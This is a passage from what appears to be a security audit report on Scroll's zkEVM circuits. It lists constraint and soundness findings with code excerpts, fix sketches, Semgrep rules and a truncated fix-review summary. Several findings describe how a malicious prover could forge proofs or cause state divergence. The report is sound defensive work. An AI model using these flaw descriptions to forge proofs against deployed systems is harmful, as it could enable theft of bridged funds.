            "hash == h(key_hash, other_leaf_data_hash)",
            [
                other_key_hash.current(),
                other_leaf_data_hash.current(),
                hash.current(),
            ],
            poseidon,
        );
    });

Figure 3.1: mpt-circuit/src/gadgets/mpt_update/nonexistence_proof.rs#7–54

The Scroll team has stated that this is a specification error and that the missing constraints do not impact the soundness of the circuit.

Recommendations
Short term, update the specification to remove the description of these constraints; ensure that the documentation is kept updated. Long term, add positive and negative tests for both types of nonexistence proofs.

+4. Discrepancies between the MPT circuit specification and implementation
Severity: Informational
Difficulty: N/A
Type: Cryptography
Finding ID: TOB-SCROLL2-4
Target: Several files

Description
The MPT circuit implementation is not faithful to the circuit specification in many areas and does not contain comments for the constraints that are either missing from the implementation or that diverge from those in the specification.

The allowed segment transitions depend on the proof type. For the NonceChanged proof type, the specification states that the Start segment type can transition to Start and that the AccountLeaf0 segment type also can transition to Start. However, neither of these paths is allowed in the implementation.

MPTProofType::NonceChanged
| MPTProofType::BalanceChanged
| MPTProofType::CodeSizeExists
| MPTProofType::CodeHashExists => [
    (
        SegmentType::Start,
        vec![
            SegmentType::AccountTrie,  // mpt has > 1 account
            SegmentType::AccountLeaf0, // mpt has <= 1 account
        ],
    ),
    (
        SegmentType::AccountTrie,
        vec![
            SegmentType::AccountTrie,
            SegmentType::AccountLeaf0,
            SegmentType::Start, // empty account proof
        ],
    ),
    (SegmentType::AccountLeaf0, vec![SegmentType::AccountLeaf1]),
    (SegmentType::AccountLeaf1, vec![SegmentType::AccountLeaf2]),
    (SegmentType::AccountLeaf2, vec![SegmentType::AccountLeaf3]),
    (SegmentType::AccountLeaf3, vec![SegmentType::Start]),

Figure 4.1: mpt-circuit/src/gadgets/mpt_update/segment.rs#20–

Figure 4.2: Part of the MPT specification (spec/mpt-proof.md#L318-L328)

The transitions allowed for the PoseidonCodeHashExists proof type also do not match: the specification states that it has the same transitions as the NonceChanged proof type, but the implementation has different transitions.

The key depth direction checks also do not match the specification. The specification states that the depth parameter should be used, but the implementation uses depth - 1.
cb.condition(is_trie.clone(), |cb| {
    cb.add_lookup(
        "direction is correct for key and depth",
        [key.current(), depth.current() - 1, direction.current()],
        key_bit.lookup(),
    );
    cb.assert_equal(
        "depth increases by 1 in trie segments",
        depth.current(),
        depth.previous() + 1,
    );
    cb.condition(path_type.current_matches(&[PathType::Common]), |cb| {
        cb.add_lookup(
            "direction is correct for other_key and depth",
            [
                other_key.current(),
                depth.current() - 1,

Figure 4.3: mpt-circuit/src/gadgets/mpt_update.rs#188–

Figure 4.4: Part of the MPT specification (spec/mpt-proof.md#L279-L282)

Finally, the specification states that when a segment type is a non-trie type, the value of key should be constrained to 0, but this constraint is omitted from the implementation.

cb.condition(!is_trie, |cb| {
    cb.assert_zero("depth is 0 in non-trie segments", depth.current());
});

Figure 4.5: mpt-circuit/src/gadgets/mpt_update.rs#212–214

Figure 4.6: Part of the MPT specification (spec/mpt-proof.md#L284-L286)

Recommendations
Short term, review the specification and ensure its consistency. Match the implementation with the specification, and document possible optimizations that remove constraints, detailing why they do not cause soundness issues. Long term, include both positive and negative tests for all edge cases in the specification.
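For the omitted key constraint, the fix could be as small as extending the condition shown in figure 4.5; a sketch, assuming the key column is in scope at that point in the circuit:

// Sketch only: adds the constraint that the specification requires but the
// implementation omits. Assumes `key` is the key column in scope here.
cb.condition(!is_trie, |cb| {
    cb.assert_zero("depth is 0 in non-trie segments", depth.current());
    cb.assert_zero("key is 0 in non-trie segments", key.current());
});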
+5. Redundant lookups in the Word RLC circuit
Severity: Informational
Difficulty: N/A
Type: Cryptography
Finding ID: TOB-SCROLL2-5
Target: src/gadgets/mpt_update/word_rlc.rs

Description
The Word RLC circuit has two redundant lookups into the BytesLookup table. The Word RLC circuit combines the random linear combination (RLC) for the lower and upper 16 bytes of a word into a single RLC value. For this, it checks that the lower and upper word segments are 16 bytes by looking into the BytesLookup table, and it checks that their RLCs are correctly computed by looking into the RlcLookup table. However, the lookup into the RlcLookup table will also ensure that the lower and upper segments of the word have the correct 16 bytes, making the first two lookups redundant.

pub fn configure(
    cb: &mut ConstraintBuilder<F>,
    [word_hash, high, low]: [AdviceColumn; 3],
    [rlc_word, rlc_high, rlc_low]: [SecondPhaseAdviceColumn; 3],
    poseidon: &impl PoseidonLookup,
    bytes: &impl BytesLookup,
    rlc: &impl RlcLookup,
    randomness: Query<F>,
) {
    cb.add_lookup(
        "old_high is 16 bytes",
        [high.current(), Query::from(15)],
        bytes.lookup(),
    );
    cb.add_lookup(
        "old_low is 16 bytes",
        [low.current(), Query::from(15)],
        bytes.lookup(),
    );
    cb.poseidon_lookup(
        "word_hash = poseidon(high, low)",
        [high.current(), low.current(), word_hash.current()],
        poseidon,
    );
    cb.add_lookup(
        "rlc_high = rlc(high) and high is 16 bytes",
        [high.current(), Query::from(15), rlc_high.current()],
        rlc.lookup(),
    );
    cb.add_lookup(
        "rlc_low = rlc(low) and low is 16 bytes",
        [low.current(), Query::from(15), rlc_low.current()],
        rlc.lookup(),

Figure 5.1: mpt-circuit/src/gadgets/mpt_update/word_rlc.rs#16–49

Although the WordRLC::configure function receives two different lookup objects, bytes and rlc, they are instantiated with the same concrete lookup:

let mpt_update = MptUpdateConfig::configure(
    cs,
    &mut cb,
    poseidon,
    &key_bit,
    &byte_representation,
    &byte_representation,
    &rlc_randomness,
    &canonical_representation,
);

Figure 5.2: mpt-circuit/src/mpt.rs#60–69

We also note that the labels refer to the upper and lower bytes as old_high and old_low instead of just high and low.

Recommendations
Short term, determine whether both the BytesLookup and RlcLookup tables are needed for this circuit, and refactor the circuit accordingly, removing the redundant constraints. Long term, review the codebase for duplicated or redundant constraints using manual and automated methods.

+6. The NonceChanged configuration circuit does not constrain the new nonce value
Severity: High
Difficulty: Low
Type: Cryptography
Finding ID: TOB-SCROLL2-6
Target: src/gadgets/mpt_update.rs

Description
The NonceChanged configuration circuit does not constrain the config.new_value parameter to be 8 bytes. Instead, there is a duplicated constraint for config.old_value:

SegmentType::AccountLeaf3 => {
    cb.assert_zero("direction is 0", config.direction.current());
    let old_code_size = (config.old_hash.current() - config.old_value.current())
        * Query::Constant(F::from(1 << 32).square().invert().unwrap());
    let new_code_size = (config.new_hash.current() - config.new_value.current())
        * Query::Constant(F::from(1 << 32).square().invert().unwrap());
    cb.condition(
        config.path_type.current_matches(&[PathType::Common]),
        |cb| {
            cb.add_lookup(
                "old nonce is 8 bytes",
                [config.old_value.current(), Query::from(7)],
                bytes.lookup(),
            );
            cb.add_lookup(
                "new nonce is 8 bytes",
                [config.old_value.current(), Query::from(7)],
                bytes.lookup(),
            );

Figure 6.1: mpt-circuit/src/gadgets/mpt_update.rs#1209–1228

This means that a malicious prover could update the Account node with a value of arbitrary length for the Nonce and Codesize parameters. The same constraint (with a correct label but incorrect value) is used in the ExtensionNew path type:

cb.condition(
    config.path_type.current_matches(&[PathType::ExtensionNew]),
    |cb| {
        cb.add_lookup(
            "new nonce is 8 bytes",
            [config.old_value.current(), Query::from(7)],
            bytes.lookup(),
        );

Figure 6.2: mpt-circuit/src/gadgets/mpt_update.rs#1241–1248

Exploit Scenario
A malicious prover uses the NonceChanged proof to update the nonce with a larger-than-expected value.

Recommendations
Short term, enforce the constraint for the config.new_value witness. Long term, add positive and negative testing of the edge cases present in the specification. For both the Common and ExtensionNew path types, there should be a negative test that fails because it changes the new nonce to a value larger than 8 bytes. Use automated testing tools like Semgrep to find redundant and duplicate constraints, as these could indicate that a constraint is incorrect.
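The short-term fix is a one-identifier change in each of the two mislabeled lookups shown in figures 6.1 and 6.2; a sketch:

// Sketch only: the lookup labeled "new nonce is 8 bytes" must range-check
// config.new_value rather than config.old_value.
cb.add_lookup(
    "new nonce is 8 bytes",
    [config.new_value.current(), Query::from(7)],
    bytes.lookup(),
);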
+7. The Copy circuit does not totally enforce the tag values
Severity: Informational
Difficulty: N/A
Type: Cryptography
Finding ID: TOB-SCROLL2-7
Target: src/copy_circuit/copy_gadgets.rs

Description
The Copy table includes a tag column that indicates the type of data for that particular row. However, the Copy circuit tag validation function does not totally ensure that the tag matches one of the predefined tag values. The implementation uses the copy_gadgets::constrain_tag function to bind the is_precompiled, is_tx_calldata, is_bytecode, is_memory, and is_tx_log witnesses to the actual tag value. However, the code does not ensure that exactly one of these Boolean values is true.

#[allow(clippy::too_many_arguments)]
pub fn constrain_tag<F: Field>(
    meta: &mut ConstraintSystem<F>,
    q_enable: Column<Fixed>,
    tag: BinaryNumberConfig,
    is_precompiled: Column<Advice>,
    is_tx_calldata: Column<Advice>,
    is_bytecode: Column<Advice>,
    is_memory: Column<Advice>,
    is_tx_log: Column<Advice>,
) {
    meta.create_gate("decode tag", |meta| {
        let enabled = meta.query_fixed(q_enable, CURRENT);
        let is_precompile = meta.query_advice(is_precompiled, CURRENT);
        let is_tx_calldata = meta.query_advice(is_tx_calldata, CURRENT);
        let is_bytecode = meta.query_advice(is_bytecode, CURRENT);
        let is_memory = meta.query_advice(is_memory, CURRENT);
        let is_tx_log = meta.query_advice(is_tx_log, CURRENT);
        let precompiles = sum::expr([
            tag.value_equals(
                CopyDataType::Precompile(PrecompileCalls::Ecrecover),
                CURRENT,
            )(meta),
            tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Sha256), CURRENT)(meta),
            tag.value_equals(
                CopyDataType::Precompile(PrecompileCalls::Ripemd160),
                CURRENT,
            )(meta),
            tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Identity), CURRENT)(meta),
            tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Modexp), CURRENT)(meta),
            tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Bn128Add), CURRENT)(meta),
            tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Bn128Mul), CURRENT)(meta),
            tag.value_equals(
                CopyDataType::Precompile(PrecompileCalls::Bn128Pairing),
                CURRENT,
            )(meta),
            tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Blake2F), CURRENT)(meta),
        ]);
        vec![
            // Match boolean indicators to their respective tag values.
            enabled.expr() * (is_precompile - precompiles),
            enabled.expr()
                * (is_tx_calldata - tag.value_equals(CopyDataType::TxCalldata, CURRENT)(meta)),
            enabled.expr()
                * (is_bytecode - tag.value_equals(CopyDataType::Bytecode, CURRENT)(meta)),
            enabled.expr() * (is_memory - tag.value_equals(CopyDataType::Memory, CURRENT)(meta)),
            enabled.expr() * (is_tx_log - tag.value_equals(CopyDataType::TxLog, CURRENT)(meta)),
        ]
    });
}

Figure 7.1: copy_circuit/copy_gadgets.rs#13–62

In fact, the tag value could equal CopyDataType::RlcAcc, as in the SHA3 gadget. The CopyDataType::Padding value is also not currently matched. In the current state of the codebase, this issue does not appear to cause any soundness issues because the lookups into the Copy table either use a statically set source and destination tag or, as in the case of precompiles, the value is correctly bounded and does not pose an avenue of attack for a malicious prover. We also observe that the Copy circuit specification mentions a witness value for the is_rlc_acc case, but this is not reflected in the code.

Recommendations
Short term, ensure that the tag column is fully constrained. Review the circuit specification and match the implementation with the specification, documenting possible optimizations that remove constraints and detailing why they do not cause soundness issues. Long term, include negative tests for an unintended tag value.
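One way to fully constrain the tag is to give the remaining CopyDataType variants indicator witnesses as well and require all indicators to sum to 1 on enabled rows. A sketch of an additional gate polynomial follows; is_rlc_acc and is_padding are hypothetical indicator columns that would be bound to their tag values in the same way as the existing ones:

// Sketch only: an extra polynomial for the "decode tag" gate. is_rlc_acc and
// is_padding are hypothetical indicators; with them included, the indicators
// must sum to 1 on enabled rows, so the tag matches exactly one known variant.
enabled.expr()
    * (is_precompile.clone()
        + is_tx_calldata.clone()
        + is_bytecode.clone()
        + is_memory.clone()
        + is_tx_log.clone()
        + is_rlc_acc
        + is_padding
        - 1.expr()),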
+8. The “invalid creation” error handling circuit is unconstrained
Severity: High
Difficulty: Medium
Type: Cryptography
Finding ID: TOB-SCROLL2-8
Target: evm_circuit/execution/error_invalid_creation_code.rs

Description
The “invalid creation” error handling circuit does not constrain the first byte of the actual memory to be 0xef as intended. This allows a malicious prover to redirect the EVM execution to a halt after the CREATE opcode is called, regardless of the memory value. The ErrorInvalidCreationCodeGadget circuit was updated to accommodate the memory addressing optimizations. However, in doing so, the first_byte witness value that was bound to the memory’s first byte is no longer bound to it. Therefore, a malicious prover can always satisfy the circuit constraints, even if they are not in an error state after the CREATE opcode is called.

fn configure(cb: &mut EVMConstraintBuilder<F>) -> Self {
    let opcode = cb.query_cell();
    let first_byte = cb.query_cell();
    //let address = cb.query_word_rlc();
    let offset = cb.query_word_rlc();
    let length = cb.query_word_rlc();
    let value_left = cb.query_word_rlc();
    cb.stack_pop(offset.expr());
    cb.stack_pop(length.expr());
    cb.require_true("is_create is true", cb.curr.state.is_create.expr());
    let address_word = MemoryWordAddress::construct(cb, offset.clone());
    // lookup memory for first word
    cb.memory_lookup(
        0.expr(),
        address_word.addr_left(),
        value_left.expr(),
        value_left.expr(),
        None,
    );
    // let first_byte = value_left.cells[address_word.shift()];
    // constrain first byte is 0xef
    let is_first_byte_invalid = IsEqualGadget::construct(cb, first_byte.expr(), 0xef.expr());
    cb.require_true(
        "is_first_byte_invalid is true",
        is_first_byte_invalid.expr(),
    );

Figure 8.1: evm_circuit/execution/error_invalid_creation_code.rs#36–67

Exploit Scenario
A malicious prover generates two different proofs for the same transaction, one leading to the error state and the other successfully executing the CREATE opcode. Distributing these proofs to two ends of a bridge leads to state divergence and a loss of funds.

Recommendations
Short term, bind the first_byte witness value to the memory value; ensure that the successful CREATE end state checks that the first byte is different from 0xef. Long term, investigate ways to generate malicious traces that could be added to the test suite; every time a new soundness issue is found, create such a malicious trace and add it to the test suite.

+9. The OneHot primitive allows more than one value at once
Severity: High
Difficulty: Low
Type: Cryptography
Finding ID: TOB-SCROLL2-9
Target: constraint_builder/binary_column.rs

Description
The OneHot primitive uses BinaryQuery values as witness values. However, despite their name, these values are not constrained to be Boolean values, allowing a malicious prover to choose more than one “hot” value in the data structure.

impl OneHot {
    pub fn configure(
        cs: &mut ConstraintSystem<F>,
        cb: &mut ConstraintBuilder<F>,
    ) -> Self {
        let mut columns = HashMap::new();
        for variant in Self::nonfirst_variants() {
            columns.insert(variant, cb.binary_columns::<1>(cs)[0]);
        }
        let config = Self { columns };
        cb.assert(
            "sum of binary columns in OneHot is 0 or 1",
            config.sum(0).or(!config.sum(0)),
        );
        config
    }

Figure 9.1: mpt-circuit/src/gadgets/one_hot.rs#14–30

The BinaryQuery values are not constrained to be Boolean because the BinaryColumn configuration does not constrain the advice values to be Boolean; the configuration is simply a type wrapper around the Column type. This provides no guarantees to the users of this API, who might assume that these values are guaranteed to be Boolean.

pub fn configure(
    cs: &mut ConstraintSystem<F>,
    _cb: &mut ConstraintBuilder<F>,
) -> Self {
    let advice_column = cs.advice_column();
    // TODO: constrain to be binary here...
    // cb.add_constraint()
    Self(advice_column)
}

Figure 9.2: mpt-circuit/src/constraint_builder/binary_column.rs#29–37

The OneHot primitive is used to implement the Merkle path-checking state machine, including critical properties such as requiring the key and other_key columns to remain unchanged along a given Merkle path calculation, as shown in figure 9.3.

cb.condition(
    !segment_type.current_matches(&[SegmentType::Start, SegmentType::AccountLeaf3]),
    |cb| {
        cb.assert_equal(
            "key can only change on Start or AccountLeaf3 rows",
            key.current(),
            key.previous(),
        );
        cb.assert_equal(
            "other_key can only change on Start or AccountLeaf3 rows",
            other_key.current(),
            other_key.previous(),
        );
    },
);

Figure 9.3: mpt-circuit/src/gadgets/mpt_update.rs#170–184

We did not develop a proof-of-concept exploit for the path-checking table, so it may be the case that the constraint in figure 9.3 is not exploitable due to other constraints. However, if at any point it is possible to match both SegmentType::Start and some other segment type (such as by setting one OneHot cell to 1 and another to -1), a malicious prover would be able to change the key partway through and forge Merkle updates.

Exploit Scenario
A malicious prover uses the OneHot soundness issue to bypass the constraints that ensure that the key and other_key columns remain unchanged along a given Merkle path calculation. This allows the attacker to forge MPT update proofs that update an arbitrary key.

Recommendations
Short term, add constraints that ensure that the advice values from these columns are Boolean. Long term, add positive and negative tests ensuring that these constraint builders operate according to their expectations.
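A minimal version of the short-term fix in BinaryColumn::configure could look like the following sketch, which constrains every cell v of the column to satisfy v * (v - 1) == 0. (The fix Scroll later shipped expresses the same product through BinaryQuery operators; see the fix review of TOB-SCROLL2-9 below.)

// Sketch only: reuse the AdviceColumn wrapper's Query arithmetic to require
// that each cell of the column is 0 or 1. The column is queried twice because
// Query is not clonable in this codebase.
pub fn configure(
    cs: &mut ConstraintSystem<F>,
    cb: &mut ConstraintBuilder<F>,
) -> Self {
    let advice_column = cs.advice_column();
    cb.assert_zero(
        "binary column is 0 or 1",
        AdviceColumn(advice_column).current()
            * (AdviceColumn(advice_column).current() - 1),
    );
    Self(advice_column)
}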
+10. Intermediate columns are not explicit
Severity: Informational
Difficulty: N/A
Type: Cryptography
Finding ID: TOB-SCROLL2-10
Target: src/mpt_update.rs

Description
The MPT update circuit includes two arrays of “intermediate value” columns, as shown in figure 10.1.

intermediate_values: [AdviceColumn; 10], // can be 4?
second_phase_intermediate_values: [SecondPhaseAdviceColumn; 10], // 4?

Figure 10.1: mpt-circuit/src/gadgets/mpt_update.rs#65–66

These columns are used as general-use cells for values that are only conditionally needed in a given row, reducing the total number of columns needed. For example, figure 10.2 shows that intermediate_values[0] is used for the address value in rows that match SegmentType::Start, but as shown in figure 10.3, rows representing the SegmentType::AccountLeaf3 state of a Keccak code-hash proof use that same slot for the old_high value.

let address = self.intermediate_values[0].current() * is_start();

Figure 10.2: mpt-circuit/src/gadgets/mpt_update.rs#78

SegmentType::AccountLeaf3 => {
    cb.assert_equal("direction is 1", config.direction.current(), Query::one());
    let [old_high, old_low, new_high, new_low, ..] = config.intermediate_values;

Figure 10.3: mpt-circuit/src/gadgets/mpt_update.rs#1632–1635

In some cases, cells of intermediate_values are used starting from the end of the array, such as the other_key_hash and other_leaf_data_hash values in PathType::ExtensionOld rows, as illustrated in figure 10.4.

let [.., key_equals_other_key, new_hash_is_zero] = config.is_zero_gadgets;
let [.., other_key_hash, other_leaf_data_hash] = config.intermediate_values;
nonexistence_proof::configure(
    cb,
    config.new_value,
    config.key,
    config.other_key,
    key_equals_other_key,
    config.new_hash,
    new_hash_is_zero,
    other_key_hash,
    other_leaf_data_hash,
    poseidon,
);

Figure 10.4: mpt-circuit/src/gadgets/mpt_update.rs#1036–1049

Although we did not find any mistakes such as misused columns, this pattern is ad hoc and error-prone, and evaluating the correctness of this pattern requires checking every individual use of intermediate_values.

Recommendations
Short term, document the assignment of all intermediate_values columns in each relevant case. Long term, consider using Rust types to express the different uses of the various intermediate_values columns. For example, one could define an IntermediateValues enum, with cases like StartRow { address: &AdviceColumn } and ExtensionOld { other_key_hash: &AdviceColumn, other_leaf_data_hash: &AdviceColumn }, and a single function fn parse_intermediate_values(segment_type: SegmentType, path_type: PathType, columns: &[AdviceColumn; 10]) -> IntermediateValues. Then, the correct assignment and use of intermediate_values columns can be audited by checking parse_intermediate_values alone.
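A sketch of that refactoring, with hypothetical variants covering only the two uses shown in figures 10.2 and 10.4 (the real definition would enumerate every case):

// Sketch only: variants and column indices are illustrative. The point is
// that every (SegmentType, PathType) use of intermediate_values is resolved
// in a single auditable function.
enum IntermediateValues<'a> {
    StartRow {
        address: &'a AdviceColumn,
    },
    ExtensionOld {
        other_key_hash: &'a AdviceColumn,
        other_leaf_data_hash: &'a AdviceColumn,
    },
    // ... one variant per remaining (SegmentType, PathType) combination
}

fn parse_intermediate_values(
    segment_type: SegmentType,
    path_type: PathType,
    columns: &[AdviceColumn; 10],
) -> IntermediateValues<'_> {
    match (segment_type, path_type) {
        (SegmentType::Start, _) => IntermediateValues::StartRow {
            address: &columns[0],
        },
        (_, PathType::ExtensionOld) => IntermediateValues::ExtensionOld {
            other_key_hash: &columns[8],
            other_leaf_data_hash: &columns[9],
        },
        _ => unimplemented!("remaining cases elided from this sketch"),
    }
}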
A. Vulnerability Categories
The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.

Vulnerability Categories
Access Controls: Insufficient authorization or assessment of rights
Auditing and Logging: Insufficient auditing of actions or logging of problems
Authentication: Improper identification of users
Configuration: Misconfigured servers, devices, or software components
Cryptography: A breach of system confidentiality or integrity
Data Exposure: Exposure of sensitive information
Data Validation: Improper reliance on the structure or values of data
Denial of Service: A system failure with an availability impact
Error Reporting: Insecure or insufficient reporting of error conditions
Patching: Use of an outdated software package or library
Session Management: Improper identification of authenticated users
Testing: Insufficient test methodology or test coverage
Timing: Race conditions or other order-of-operations flaws
Undefined Behavior: Undefined behavior triggered within the system

Severity Levels
Informational: The issue does not pose an immediate risk but is relevant to security best practices.
Undetermined: The extent of the risk was not determined during this engagement.
Low: The risk is small or is not one the client has indicated is important.
Medium: User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High: The flaw could affect numerous users and have serious reputational, legal, or financial implications.

Difficulty Levels
Undetermined: The difficulty of exploitation was not determined during this engagement.
Low: The flaw is well known; public tools for its exploitation exist or can be scripted.
Medium: An attacker must write an exploit or will need in-depth knowledge of the system.
High: An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue.

B. Code Maturity Categories
The following tables describe the code maturity categories and rating criteria used in this document.

Code Maturity Categories
Arithmetic: The proper use of mathematical operations and semantics
Complexity Management: The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Cryptography and Key Management: The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution
Documentation: The presence of comprehensive and readable codebase documentation
Memory Safety and Error Handling: The presence of memory safety and robust error-handling mechanisms
Testing and Verification: The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage

Rating Criteria
Strong: No issues were found, and the system exceeds industry standards.
Satisfactory: Minor issues were found, but the system is compliant with best practices.
Moderate: Some issues that may affect system safety were found.
Weak: Many issues that affect system safety were found.
Missing: A required component is missing, significantly affecting system safety.
Not Applicable: The category is not applicable to this review.
Not Considered: The category was not considered in this review.
Further Investigation Required: Further investigation is required to reach a meaningful conclusion.

C. Code Quality Findings
We identified the following code quality issues through manual and automatic code review.

● Enable the dead_code lint and fix all issues. The dead_code lint is currently disabled; it should be enabled to allow developers to quickly detect unused functions and variables.

● Several constraints have meaningless labels. Constraint labels are useful for explaining the intention behind constraints; using meaningless labels hinders code readability.

region
    .assign_fixed(
        || "asdfasdfawe",
        self.0,

Figure C.1: mpt-circuit/src/constraint_builder/column.rs#52–55

cb.assert_equal("???????", rlc.current(), byte.current());
});
cb.condition(!index_is_zero.current(), |cb| {
    cb.assert_equal(
        "value can only change when index = 0",
        value.current(),
        value.previous(),
    );
    cb.assert_equal(
        "differences_are_zero_so_far = difference == 0 && differences_are_zero_so_far.previous() when index != 0",
        differences_are_zero_so_far.current().into(),
        differences_are_zero_so_far
            .previous()
            .and(difference_is_zero.previous())
            .into(),
    );
    cb.assert_equal(
        "???",

Figure C.2: mpt-circuit/src/gadgets/canonical_representation.rs#72–89

● There are duplicate and unused functions in the codebase. The types.rs and util.rs files have several duplicate functions: fr, hash, storage_key_hash, split_word, hi_lo, and Bit.

● The following constraint label was incorrectly copy-pasted.

cb.assert_equal(
    "old_value does not change",
    new_value.current(),
    new_value.previous(),
);

Figure C.3: mpt-circuit/src/gadgets/mpt_update.rs#163–167

● There are redundant constraints in empty storage/account constraints. The configure_empty_storage and configure_empty_account functions require the new_value and old_value fields to be 0 but also constrain them to be equal.

cb.assert_zero(
    "old value is 0 for empty storage",
    config.old_value.current(),
);
cb.assert_zero(
    "new value is 0 for empty storage",
    config.new_value.current(),
);
...
cb.assert_equal(
    "old value = new value for empty account proof",
    config.old_value.current(),
    config.new_value.current(),
);

Figure C.4: mpt-circuit/src/gadgets/mpt_update.rs#1785–1811

cb.assert_zero("old value is 0", config.old_value.current());
cb.assert_zero("new value is 0", config.new_value.current());
...
cb.assert_equal(
    "old value = new value for empty account proof",
    config.old_value.current(),
    config.new_value.current(),
);

Figure C.5: mpt-circuit/src/gadgets/mpt_update.rs#1869–1893

● The following constraint label is imprecise. The label should read rwc_inc_left[1] == rwc_inc_left[0] - rwc_diff, or 0 at the end to match the code.

// Decrement rwc_inc_left for the next row, when an RW operation happens.
let rwc_diff = is_rw_type.expr() * is_word_end.expr();
let new_value = meta.query_advice(rwc_inc_left, CURRENT) - rwc_diff;
// At the end, it must reach 0.
let update_or_finish = select::expr(
    not::expr(is_last.expr()),
    meta.query_advice(rwc_inc_left, NEXT_ROW),
    0.expr(),
);
cb.require_equal(
    "rwc_inc_left[2] == rwc_inc_left[0] - rwc_diff, or 0 at the end",
    new_value,
    update_or_finish,
);

Figure C.6: src/copy_circuit/copy_gadgets.rs#524–537

● The IsZeroGadget assign function does not assign the witness value.

pub fn assign<T: TryInto<F>>(
    &self,
    region: &mut Region<'_, F>,
    offset: usize,
    value: T,
) where
    <T as TryInto<F>>::Error: Debug,
{
    self.inverse_or_zero.assign(
        region,
        offset,
        value.try_into().unwrap().invert().unwrap_or(F::zero()),
    );
}

// TODO: get rid of assign method in favor of it.
pub fn assign_value_and_inverse<T: Copy + TryInto<F>>(
    &self,
    region: &mut Region<'_, F>,
    offset: usize,
    value: T,
) where
    <T as TryInto<F>>::Error: Debug,
{
    self.value.assign(region, offset, value);
    self.assign(region, offset, value);
}

Figure C.7: mpt-circuit/src/gadgets/is_zero.rs#20–46

● The OneHot assign function should ensure that no more than one item is assigned.

pub fn assign(&self, region: &mut Region<'_, F>, offset: usize, value: T) {
    if let Some(c) = self.columns.get(&value) {
        c.assign(region, offset, true)
    }
}

Figure C.8: mpt-circuit/src/gadgets/one_hot.rs#31–

● There is a redundant condition in the configure_empty_account function. The function could just match SegmentType::Start.

SegmentType::Start | SegmentType::AccountTrie => {
    let is_final_segment = config.segment_type.next_matches(&[SegmentType::Start]);
    cb.condition(is_final_segment, |cb| {

Figure C.9: mpt-circuit/src/gadgets/mpt_update.rs#1878–1880

● There is a redundant .and() call in the MptUpdateConfig configure function. The cb.every_row_selector() function returns the first condition in the condition stack, so this condition is equivalent to is_start.

cb.condition(is_start.clone().and(cb.every_row_selector()), |cb| {

Figure C.10: mpt-circuit/src/gadgets/mpt_update.rs#124

● The rw_counter constraints could be consolidated. Constraining rw_counter requires constraining the tag to Memory or TxLog and constraining the Padding to +0. These constraints are implemented in different locations in the codebase, making the code harder to understand.

let is_rw_type = meta.query_advice(is_memory, CURRENT) + is_tx_log.expr();

Figure C.11: src/copy_circuit.rs#340–341

// Decrement rwc_inc_left for the next row, when an RW operation happens.
let rwc_diff = is_rw_type.expr() * is_word_end.expr();

Figure C.12: copy_circuit/copy_gadgets.rs#L525

● The following constraint label is imprecise. The label should read assign real_bytes_left {}.
// real_bytes_left
region.assign_advice(
    || format!("assign bytes_left {}", *offset),
    self.copy_table.real_bytes_left,
    *offset,
    || Value::known(F::zero()),
)?;

Figure C.13: src/copy_circuit.rs#776–

D. Automated Analysis Tool Configuration
As part of this assessment, we used the tools described below to perform automated testing of the codebase.

D.1. Semgrep
We used the static analyzer Semgrep to search for risky API patterns and weaknesses in the source code repository. For this purpose, we wrote rules specifically targeting the ConstraintBuilder APIs and the ExecutionGadget trait.

semgrep --metrics=off --sarif --config=custom_rule_path.yml

Figure D.1: The invocation command used to run Semgrep for each custom rule

Duplicate Constraints
The presence of duplicate constraints, with potentially different labels, indicates either a redundant constraint that can be removed or an intended constraint that was not correctly updated. This pattern was written to find variants of finding TOB-SCROLL2-6, but no other instances of it were found in the codebase. However, this pattern should be added as a CI/CD Semgrep rule to prevent a similar issue from recurring in the codebase.

rules:
  - id: repeated-constraints
    message: "Found redundant or incorrectly updated constraint"
    languages: [rust]
    severity: ERROR
    patterns:
      - pattern: |
          cb.$FUNC($LABEL1, $LEFT, $RIGHT);
          ...
          cb.$FUNC($LABEL2, $LEFT, $RIGHT);

Figure D.2: The repeated-constraints Semgrep rule

Constraints with Repeated Labels
The presence of a repeated label could indicate a copy-pasted label that should be updated.

rules:
  - id: constraints-with-repeated-labels
    message: "Found constraints with the same label"
    languages: [rust]
    severity: ERROR
    patterns:
      - pattern: |
          cb.$FUNC("$LABEL", ...);
          ...
          cb.$FUNC("$LABEL", ...);

Figure D.3: The repeated-labels Semgrep rule

D.2. cargo llvm-cov
cargo-llvm-cov generates Rust code coverage reports. We used the cargo llvm-cov --open command in the MPT codebase to generate the coverage report presented in the Automated Testing section.

D.3. cargo edit
cargo-edit allows developers to quickly find outdated Rust crates. The tool can be installed with the cargo install cargo-edit command, and the cargo upgrade --incompatible --dry-run command can be used to find outdated crates.

D.4. Clippy
The Rust linter Clippy can be installed using rustup by running the command rustup component add clippy. Invoking cargo clippy --workspace -- -W clippy::pedantic in the root directory of the project runs the tool with the pedantic ruleset.

cargo clippy --workspace -- -W clippy::pedantic

Figure D.4: The invocation command used to run Clippy in the codebase

E. Fix Review Results
When undertaking a fix review, Trail of Bits reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system.

From September 25 to September 29, 2023, Trail of Bits reviewed the fixes and mitigations implemented by the Scroll team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. Scroll provided PRs with fixes for all high-severity findings and for the informational-severity finding TOB-SCROLL2-7. Scroll did not submit fixes for the remaining informational-severity findings. In summary, of the 10 issues described in this report, Scroll has resolved three issues and has partially resolved one issue.
Scroll indicated that it does not intend to fix finding TOB-SCROLL2-2, so its status is unresolved. No fix PRs were provided for the remaining five issues, so their fix statuses are undetermined. For additional information, please see the Detailed Fix Review Results below.

ID 7: The Copy circuit does not totally enforce the tag values (Partially Resolved)
ID 8: The “invalid creation” error handling circuit is unconstrained (Resolved)
ID 9: The OneHot primitive allows more than one value at once (Resolved)

Detailed Fix Review Results

